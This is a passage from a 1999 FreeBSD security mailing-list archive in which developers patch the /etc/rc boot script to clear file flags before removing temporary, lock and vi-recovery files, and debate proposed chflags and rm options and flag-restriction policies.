/var/spool/lock/* > /dev/null 2>&1 rm -f /var/spool/lock/* + chflags -R 0 /var/spool/uucp/.Temp/* > /dev/null 2>&1 rm -rf /var/spool/uucp/.Temp/* # Keep a copy of the boot messages around dmesg >/var/run/dmesg.boot @@ -178,8 +181,8 @@ mount -a -t nfs echo . -# Whack the pty perms back into shape. -chflags 0 /dev/tty[pqrsPQRS]* +# Put the pty perms back into shape. +chflags 0 /dev/tty[pqrsPQRS]* > /dev/null 2>&1 chmod 666 /dev/tty[pqrsPQRS]* chown root:wheel /dev/tty[pqrsPQRS]* @@ -200,14 +203,17 @@ # prune quickly with one rm, then use find to clean up /tmp/[lq]* # (not needed with mfs /tmp, but doesn't hurt there...) - (cd /tmp && rm -rf [a-km-pr-zA-Z]* && + (cd /tmp && chflags -R 0 [a-km-pr-zA-Z]* && rm -rf [a-km-pr-zA-Z]* && find -d . ! -name . ! -name lost+found ! -name quota.user \ - ! -name quota.group -exec rm -rf -- {} \;) + ! -name quota.group -execdir chflags -R 0 {} \; && + find -d . ! -name . ! -name lost+found ! -name quota.user \ + ! -name quota.group -execdir rm -rf -- {} \;) > /dev/null 2>&1 fi # Remove X lock files, since they will prevent you from restarting X11 # after a system crash. +chflags 0 /tmp/.X*-lock /tmp/.X11-unix/* > /dev/null 2>&1 rm -f /tmp/.X*-lock /tmp/.X11-unix/* # snapshot any kernel -c changes back to disk here @@ -348,7 +354,7 @@ echo 'Recovering vi editor sessions' for i in ${vibackup}; do # Only test files that are readable. - if test ! -r ${i}; then + if test ! -r ${i} -o ! -f ${i}; then continue fi @@ -376,6 +382,7 @@ if test -n "${recfile}" -a -s "${recfile}"; then sendmail -t < ${i} else + chflags 0 ${i} > /dev/null 2>&1 rm -f ${i} fi done @@ -400,7 +407,7 @@ fi if [ "${update_motd}" != "NO" ]; then - T=`mktemp /tmp/_motd.XXXXXX` + T=`mktemp /var/run/_motd.XXXXXX` if [ $? -eq 0 ]; then uname -v | sed -e 's,^\([^#]*\) #\(.* [1-2][0-9][0-9][0-9]\).*/\([^\]*\) $,\1 (\3) #\2,' > ${T} awk '{if (NR == 1) {if ($1 == "FreeBSD") {next} else {print "\n"$0}} else {print}}' < /etc/motd >> ${T} To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 17:33:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.rdc1.on.home.com (ha1.rdc1.on.wave.home.com [24.2.9.66]) by hub.freebsd.org (Postfix) with ESMTP id 2626F14D3F; Sun, 29 Aug 1999 17:33:19 -0700 (PDT) (envelope-from paulg@interlog.com) Received: from interlog.com ([24.65.50.128]) by mail.rdc1.on.home.com (InterMail v4.01.01.07 201-229-111-110) with ESMTP id <19990830003127.CRCF15144.mail.rdc1.on.home.com@interlog.com>; Sun, 29 Aug 1999 17:31:27 -0700 Message-ID: <37C9CF34.EEAAF40E@interlog.com> Date: Sun, 29 Aug 1999 20:24:20 -0400 From: Paul Griffith X-Mailer: Mozilla 4.51 [en] (X11; I; SunOS 5.7 i86pc) X-Accept-Language: en MIME-Version: 1.0 To: skalir scalar Cc: freebsd-questions@freebsd.org, freebsd-security@freebsd.org Subject: Re: a [Unix Help Network] References: <19990829103406.72564.qmail@hotmail.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org skalir scalar wrote: > > Hello people, > > I am seriously considering starting up a unix help network in order to try > to unite all the different unix and or linux help channels on all irc > networks into one big network in order to serve > people better and have a much better help system. It will be called > "Unix Help Network". If you have any suggestions or comments or anything at > all PLEASE reply to this email! Thank you! > > I am sending out this email to see how many people would actually like to > see such a thing come alive and would be willing to > help out or just come on for a good time or to get help! If you are > interested please reply to this email and let me know! I am probably going > to bring it up within the next 2 weeks as I find a home for its main hub and > services. and yes I am excepting irc operator applications and server links > also looking for web hosting with someone. so if you could please help out > or are interested, please let me know! > > Sincerely, > Jason L. Schwab > (skalir@hotmail.com) Why not try to help out Unix911.com, seems like you guys are trying to do the same thing. -- Paul Griffith paulg@interlog.com | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 19:17:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 7AA7715061 for ; Sun, 29 Aug 1999 19:17:47 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA00603; Sun, 29 Aug 1999 20:17:15 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA91030; Sun, 29 Aug 1999 20:19:11 -0600 (MDT) Message-Id: <199908300219.UAA91030@harmony.village.org> To: Bruce Evans Subject: Re: Not sure if you got it... Cc: dynamo@ime.net, security@FreeBSD.ORG In-reply-to: Your message of "Mon, 30 Aug 1999 12:15:18 +1000." <199908300215.MAA01056@godzilla.zeta.org.au> References: <199908300215.MAA01056@godzilla.zeta.org.au> Date: Sun, 29 Aug 1999 20:19:10 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199908300215.MAA01056@godzilla.zeta.org.au> Bruce Evans writes: : Clearing superuser flags is wrong. If they were set by root, then root : must want them. If they were set by an intruder then they would have : been fixed appropriately by the previous security pass :-). Is there a better way to turn off all the user flags then? Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 19:17:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.26.10.9]) by hub.freebsd.org (Postfix) with ESMTP id 928571501C for ; Sun, 29 Aug 1999 19:17:45 -0700 (PDT) (envelope-from bde@godzilla.zeta.org.au) Received: (from bde@localhost) by godzilla.zeta.org.au (8.8.7/8.8.7) id MAA01056; Mon, 30 Aug 1999 12:15:18 +1000 Date: Mon, 30 Aug 1999 12:15:18 +1000 From: Bruce Evans Message-Id: <199908300215.MAA01056@godzilla.zeta.org.au> To: dynamo@ime.net, imp@village.org Subject: Re: Not sure if you got it... Cc: security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Index: rc >=================================================================== >RCS file: /home/imp/FreeBSD/CVS/src/etc/rc,v >retrieving revision 1.195 >diff -u -r1.195 rc >--- rc 1999/08/27 23:23:43 1.195 >+++ rc 1999/08/30 00:14:44 >@@ -129,8 +129,11 @@ > > clean_var() { > if [ ! -f /var/run/clean_var ]; then >+ chflags -R 0 /var/run/* > /dev/null 2>&1 Clearing superuser flags is wrong. If they were set by root, then root must want them. If they were set by an intruder then they would have been fixed appropriately by the previous security pass :-). Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 19:36: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 4431115126 for ; Sun, 29 Aug 1999 19:35:52 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA00687; Sun, 29 Aug 1999 20:35:50 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA00552; Sun, 29 Aug 1999 20:35:05 -0600 (MDT) Message-Id: <199908300235.UAA00552@harmony.village.org> Subject: Re: Not sure if you got it... To: dynamo@ime.net, security@FreeBSD.ORG In-reply-to: Your message of "Sun, 29 Aug 1999 18:18:54 MDT." <199908300018.SAA90400@harmony.village.org> References: <199908300018.SAA90400@harmony.village.org> Date: Sun, 29 Aug 1999 20:35:05 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Actually, here's the isolated fix. I'm working out the issues with chflags a reviewer brought up. I'll be committing this shortly. I wanna do a few more tests with it before making the change. Warner Index: rc =================================================================== RCS file: /home/imp/FreeBSD/CVS/src/etc/rc,v retrieving revision 1.195 diff -u -r1.195 rc --- rc 1999/08/27 23:23:43 1.195 +++ rc 1999/08/30 02:18:24 @@ -354,7 +360,9 @@ # Unmodified nvi editor backup files either have the # execute bit set or are zero length. Delete them. - if test -x ${i} -o ! -s ${i}; then + # Delete everything that isn't a normal file as well, + # since vi cannot generate them. + if test -x ${i} -o ! -s ${i} -o ! -f ${i}; then rm -f ${i} fi done To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 20: 8:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.26.10.9]) by hub.freebsd.org (Postfix) with ESMTP id 55F1F14D23 for ; Sun, 29 Aug 1999 20:08:20 -0700 (PDT) (envelope-from bde@godzilla.zeta.org.au) Received: (from bde@localhost) by godzilla.zeta.org.au (8.8.7/8.8.7) id NAA06836; Mon, 30 Aug 1999 13:07:57 +1000 Date: Mon, 30 Aug 1999 13:07:57 +1000 From: Bruce Evans Message-Id: <199908300307.NAA06836@godzilla.zeta.org.au> To: bde@zeta.org.au, imp@village.org Subject: Re: Not sure if you got it... Cc: dynamo@ime.net, security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Is there a better way to turn off all the user flags then? Turning them all off works of course: chflags dump,noopaque,nouappnd,nochg,nouunlnk Is this better :-)? It's not future-proof. I'd prefer `chflags nouflags'. cheflags.3 misdescribes the nodump flag. It says that `dump' sets the dump flag. It doesn't say that users can set it. It gives the worst possible example for the use of `no' before a flag by giving `nodump' as an example of turning off a flag. Actually, `dump' clears the nodump flag and `nodump' sets the nodump flag. The `opaque' flag is not mentioned in chflags.3. These bugs are fixed in Lite2. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 20:15:18 1999 Delivered-To: freebsd-security@freebsd.org Received: from dt011n65.san.rr.com (dt010nb9.san.rr.com [204.210.12.185]) by hub.freebsd.org (Postfix) with ESMTP id 12A11157A8 for ; Sun, 29 Aug 1999 20:15:09 -0700 (PDT) (envelope-from Doug@gorean.org) Received: from gorean.org (master [10.0.0.2]) by dt011n65.san.rr.com (8.9.3/8.8.8) with ESMTP id UAA99971; Sun, 29 Aug 1999 20:14:14 -0700 (PDT) (envelope-from Doug@gorean.org) Message-ID: <37C9F705.1041CA95@gorean.org> Date: Sun, 29 Aug 1999 20:14:13 -0700 From: Doug Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.6 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: Warner Losh Cc: dynamo@ime.net, security@FreeBSD.ORG Subject: Re: Not sure if you got it... References: <199908300018.SAA90400@harmony.village.org> <199908300235.UAA00552@harmony.village.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warner Losh wrote: > + if test -x ${i} -o ! -s ${i} -o ! -f ${i}; then If you could rewrite this as: if [ -x ${i} -o ! -s ${i} -o ! -f ${i} ]; then it would be one less thing for me to do in my "clean up the rc files" project. :) You can see the examples at http://gorean.org/rcfiles/ Thanks, Doug To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 20:39:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id AA9FD151B7 for ; Sun, 29 Aug 1999 20:39:20 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id VAA00845; Sun, 29 Aug 1999 21:37:35 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id VAA00549; Sun, 29 Aug 1999 21:36:50 -0600 (MDT) Message-Id: <199908300336.VAA00549@harmony.village.org> To: Doug Subject: Re: Not sure if you got it... Cc: dynamo@ime.net, security@FreeBSD.ORG In-reply-to: Your message of "Sun, 29 Aug 1999 20:14:13 PDT." <37C9F705.1041CA95@gorean.org> References: <37C9F705.1041CA95@gorean.org> <199908300018.SAA90400@harmony.village.org> <199908300235.UAA00552@harmony.village.org> Date: Sun, 29 Aug 1999 21:36:50 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <37C9F705.1041CA95@gorean.org> Doug writes: : > + if test -x ${i} -o ! -s ${i} -o ! -f ${i}; then : : If you could rewrite this as: : : if [ -x ${i} -o ! -s ${i} -o ! -f ${i} ]; then : : it would be one less thing for me to do in my "clean up the rc files" : project. :) You can see the examples at http://gorean.org/rcfiles/ OK. I just was following existing practice... I've fixed it in another way, however, using find. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 20:41:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id B64CC156AE for ; Sun, 29 Aug 1999 20:40:46 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id VAA00857; Sun, 29 Aug 1999 21:40:44 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id VAA00562; Sun, 29 Aug 1999 21:39:59 -0600 (MDT) Message-Id: <199908300339.VAA00562@harmony.village.org> To: Bruce Evans Subject: Re: Not sure if you got it... Cc: dynamo@ime.net, security@FreeBSD.ORG In-reply-to: Your message of "Mon, 30 Aug 1999 13:07:57 +1000." <199908300307.NAA06836@godzilla.zeta.org.au> References: <199908300307.NAA06836@godzilla.zeta.org.au> Date: Sun, 29 Aug 1999 21:39:59 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199908300307.NAA06836@godzilla.zeta.org.au> Bruce Evans writes: : >Is there a better way to turn off all the user flags then? : : Turning them all off works of course: : : chflags dump,noopaque,nouappnd,nochg,nouunlnk : : Is this better :-)? It's not future-proof. I'd prefer `chflags nouflags'. Any objections to chflags nouflags going into the tree, modulo problems with the actual code that does it? I'd also like to have a new flag to rm. -F. One -F will be chflags nouflags foo ; rm -f foo while two -F will be chflags 0 foo ; rm -f foo This is mostly for convenience, since otherwise I have to uglify the rc scripts with chflags. Comments on this idea as well? I've gotten antipathy in the past when I've asked. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 30 11: 3:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 04ACB158AB for ; Mon, 30 Aug 1999 11:03:20 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id LAA66101; Mon, 30 Aug 1999 11:01:49 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199908301801.LAA66101@gndrsh.dnsmgr.net> Subject: Re: Not sure if you got it... In-Reply-To: <199908300339.VAA00562@harmony.village.org> from Warner Losh at "Aug 29, 1999 09:39:59 pm" To: imp@village.org (Warner Losh) Date: Mon, 30 Aug 1999 11:01:49 -0700 (PDT) Cc: bde@zeta.org.au (Bruce Evans), dynamo@ime.net, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > In message <199908300307.NAA06836@godzilla.zeta.org.au> Bruce Evans writes: > : >Is there a better way to turn off all the user flags then? > : > : Turning them all off works of course: > : > : chflags dump,noopaque,nouappnd,nochg,nouunlnk > : > : Is this better :-)? It's not future-proof. I'd prefer `chflags nouflags'. > > Any objections to chflags nouflags going into the tree, modulo > problems with the actual code that does it? I don't have a problem with that. > > I'd also like to have a new flag to rm. -F. One -F will be > chflags nouflags foo ; rm -f foo > while two -F will be > chflags 0 foo ; rm -f foo I have a problem with this, it means updating 1 more chunk of code should the set of items in uflags change. -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 30 11: 8:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 59783150B0 for ; Mon, 30 Aug 1999 11:08:14 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id MAA03715; Mon, 30 Aug 1999 12:08:01 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id MAA04962; Mon, 30 Aug 1999 12:07:23 -0600 (MDT) Message-Id: <199908301807.MAA04962@harmony.village.org> To: "Rodney W. Grimes" Subject: Re: Not sure if you got it... Cc: bde@zeta.org.au (Bruce Evans), dynamo@ime.net, security@FreeBSD.ORG In-reply-to: Your message of "Mon, 30 Aug 1999 11:01:49 PDT." <199908301801.LAA66101@gndrsh.dnsmgr.net> References: <199908301801.LAA66101@gndrsh.dnsmgr.net> Date: Mon, 30 Aug 1999 12:07:23 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199908301801.LAA66101@gndrsh.dnsmgr.net> "Rodney W. Grimes" writes: : > In message <199908300307.NAA06836@godzilla.zeta.org.au> Bruce Evans writes: : > : >Is there a better way to turn off all the user flags then? : > : : > : Turning them all off works of course: : > : : > : chflags dump,noopaque,nouappnd,nochg,nouunlnk : > : : > : Is this better :-)? It's not future-proof. I'd prefer `chflags nouflags'. : > : > Any objections to chflags nouflags going into the tree, modulo : > problems with the actual code that does it? : : I don't have a problem with that. : : > : > I'd also like to have a new flag to rm. -F. One -F will be : > chflags nouflags foo ; rm -f foo : > while two -F will be : > chflags 0 foo ; rm -f foo : : I have a problem with this, it means updating 1 more chunk of code : should the set of items in uflags change. I was going to define something like UF_USERFLAGS and SF_SYSFLAGS as well... Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 30 11:14: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id A2F3C15C65 for ; Mon, 30 Aug 1999 11:13:28 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id LAA16174; Mon, 30 Aug 1999 11:12:05 -0700 (PDT) (envelope-from dillon) Date: Mon, 30 Aug 1999 11:12:05 -0700 (PDT) From: Matthew Dillon Message-Id: <199908301812.LAA16174@apollo.backplane.com> To: "Rodney W. Grimes" Cc: imp@village.org (Warner Losh), bde@zeta.org.au (Bruce Evans), dynamo@ime.net, security@FreeBSD.ORG Subject: Re: Not sure if you got it... References: <199908301801.LAA66101@gndrsh.dnsmgr.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :> :> Any objections to chflags nouflags going into the tree, modulo :> problems with the actual code that does it? : :I don't have a problem with that. : :> :> I'd also like to have a new flag to rm. -F. One -F will be :> chflags nouflags foo ; rm -f foo :> while two -F will be :> chflags 0 foo ; rm -f foo : :I have a problem with this, it means updating 1 more chunk of code :should the set of items in uflags change. : :-- :Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net Maybe what we need to do is allow a umask to be set for the flag bits in the mount. So, for example, you would be able to specify which flag bits are allowed to be set on a mount-by-mount basis (both user and system). Otherwise we may wind up spending the next year trying to 'fix' security holes in scripts related to the flag bits. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 30 11:14:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 46CD91591B for ; Mon, 30 Aug 1999 11:14:34 -0700 (PDT) (envelope-from billf@jade.chc-chimes.com) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 6551A1C14; Mon, 30 Aug 1999 13:17:24 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by jade.chc-chimes.com (Postfix) with ESMTP id 55BA53815; Mon, 30 Aug 1999 13:17:24 -0400 (EDT) Date: Mon, 30 Aug 1999 13:17:24 -0400 (EDT) From: Bill Fumerola To: "Rodney W. Grimes" Cc: Warner Losh , Bruce Evans , dynamo@ime.net, security@FreeBSD.ORG Subject: Re: Not sure if you got it... In-Reply-To: <199908301801.LAA66101@gndrsh.dnsmgr.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 30 Aug 1999, Rodney W. Grimes wrote: > > I'd also like to have a new flag to rm. -F. One -F will be > > chflags nouflags foo ; rm -f foo > > while two -F will be > > chflags 0 foo ; rm -f foo > > I have a problem with this, it means updating 1 more chunk of code > should the set of items in uflags change. Or updating rc if uflags change. -- - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 30 12:12: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id EA9FA14E42 for ; Mon, 30 Aug 1999 12:12:04 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id MAA66317; Mon, 30 Aug 1999 12:09:38 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199908301909.MAA66317@gndrsh.dnsmgr.net> Subject: Re: Not sure if you got it... In-Reply-To: <199908301807.MAA04962@harmony.village.org> from Warner Losh at "Aug 30, 1999 12:07:23 pm" To: imp@village.org (Warner Losh) Date: Mon, 30 Aug 1999 12:09:38 -0700 (PDT) Cc: bde@zeta.org.au (Bruce Evans), dynamo@ime.net, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > In message <199908301801.LAA66101@gndrsh.dnsmgr.net> "Rodney W. Grimes" writes: > : > In message <199908300307.NAA06836@godzilla.zeta.org.au> Bruce Evans writes: > : > : >Is there a better way to turn off all the user flags then? > : > : > : > : Turning them all off works of course: > : > : > : > : chflags dump,noopaque,nouappnd,nochg,nouunlnk > : > : > : > : Is this better :-)? It's not future-proof. I'd prefer `chflags nouflags'. > : > > : > Any objections to chflags nouflags going into the tree, modulo > : > problems with the actual code that does it? > : > : I don't have a problem with that. > : > : > > : > I'd also like to have a new flag to rm. -F. One -F will be > : > chflags nouflags foo ; rm -f foo > : > while two -F will be > : > chflags 0 foo ; rm -f foo > : > : I have a problem with this, it means updating 1 more chunk of code > : should the set of items in uflags change. > > I was going to define something like UF_USERFLAGS and SF_SYSFLAGS as > well... It still goes aginst my ingrained Unix ideal that says each command should do one thing and one thing only, but do it really well. If you need to do 2 things you should glue 2 commands togeather. Have we all fallen off the rocker and forgotten this is one of the design concepts behind unix, and one of the things that has made it such a powerful operating system that has withstood the test of time over and over? I was sick when they added -R to cp (why did they do that anyway?), yes I got even sicker that once we did that we had to add -v, yes, I am an old fart who is set in his ways ... :-) -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 30 12:14:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id D834F15357 for ; Mon, 30 Aug 1999 12:14:38 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id MAA66330; Mon, 30 Aug 1999 12:13:04 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199908301913.MAA66330@gndrsh.dnsmgr.net> Subject: Re: Not sure if you got it... In-Reply-To: <199908301812.LAA16174@apollo.backplane.com> from Matthew Dillon at "Aug 30, 1999 11:12:05 am" To: dillon@apollo.backplane.com (Matthew Dillon) Date: Mon, 30 Aug 1999 12:13:04 -0700 (PDT) Cc: imp@village.org (Warner Losh), bde@zeta.org.au (Bruce Evans), dynamo@ime.net, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > :> > :> Any objections to chflags nouflags going into the tree, modulo > :> problems with the actual code that does it? > : > :I don't have a problem with that. > : > :> > :> I'd also like to have a new flag to rm. -F. One -F will be > :> chflags nouflags foo ; rm -f foo > :> while two -F will be > :> chflags 0 foo ; rm -f foo > : > :I have a problem with this, it means updating 1 more chunk of code > :should the set of items in uflags change. > : > :-- > :Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net > > Maybe what we need to do is allow a umask to be set for the flag bits > in the mount. So, for example, you would be able to specify which flag > bits are allowed to be set on a mount-by-mount basis (both user and > system). Otherwise we may wind up spending the next year trying to > 'fix' security holes in scripts related to the flag bits. Hummmm.. or add a flag bit that says flags can't be set below this directory level? Domain/OS can do a similiar thing with it's ACL's. Mount points are too cource grained for this problem, /var/tmp is often just a part of /var. I might want append only flags on much of /var/log, but disallow flags in /var/{run,tmp}. -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 30 12:15: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 6DC43157CF for ; Mon, 30 Aug 1999 12:14:59 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id NAA03980; Mon, 30 Aug 1999 13:14:58 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id NAA05430; Mon, 30 Aug 1999 13:14:21 -0600 (MDT) Message-Id: <199908301914.NAA05430@harmony.village.org> To: "Rodney W. Grimes" Subject: Re: Not sure if you got it... Cc: bde@zeta.org.au (Bruce Evans), dynamo@ime.net, security@FreeBSD.ORG In-reply-to: Your message of "Mon, 30 Aug 1999 12:09:38 PDT." <199908301909.MAA66317@gndrsh.dnsmgr.net> References: <199908301909.MAA66317@gndrsh.dnsmgr.net> Date: Mon, 30 Aug 1999 13:14:21 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199908301909.MAA66317@gndrsh.dnsmgr.net> "Rodney W. Grimes" writes: : It still goes aginst my ingrained Unix ideal that says each command : should do one thing and one thing only, but do it really well. If you : need to do 2 things you should glue 2 commands togeather. Have we all : fallen off the rocker and forgotten this is one of the design concepts : behind unix, and one of the things that has made it such a powerful : operating system that has withstood the test of time over and over? rm -f integrates rm and chmod. -f is defined to be "force removal of file" which should imply removing user flags, but doing so would be present certain difficulties.. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 30 12:15:27 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org 